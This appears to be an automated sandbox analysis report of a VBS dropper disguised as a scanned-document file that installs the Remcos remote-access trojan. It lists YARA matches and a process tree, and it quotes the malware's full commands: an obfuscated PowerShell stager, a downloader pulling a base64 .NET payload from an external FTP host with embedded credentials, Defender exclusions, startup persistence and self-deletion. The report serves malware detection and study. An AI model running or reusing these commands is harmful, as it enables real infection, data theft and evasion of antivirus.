                    Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.winVBS@37/31@4/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,20_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,20_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-52K54M
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2016:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjtezlof.q34.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SKMBT_77122012816310TD0128_17311_XLS.vbsVirustotal: Detection: 9%
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [chJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
